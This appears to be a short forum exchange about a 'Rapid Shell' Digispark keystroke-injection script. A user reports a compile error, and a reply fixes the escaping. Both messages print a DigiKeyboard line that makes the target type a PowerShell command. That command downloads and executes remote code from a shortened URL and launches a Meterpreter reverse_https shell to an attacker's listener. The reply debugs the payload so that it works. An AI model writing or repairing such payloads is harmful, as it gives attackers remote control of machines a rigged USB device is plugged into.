Rapid Shell
Error when uploading script:
msf:50:135: error: expected ';' before 'windows'
DigiKeyboard.println("powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <192.168.1.51> -Lport <4444> -Force""); // Edit both Lhost and Lport according to your setup
^
exit status 1 too many decimal points in number
Sorry for the late reply, I missed the notification. Looks like the double quotes aren't escaped. This should do the trick:
DigiKeyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <192.168.1.51> -Lport <4444> -Force\""); // Edit both Lhost and Lport according to your setup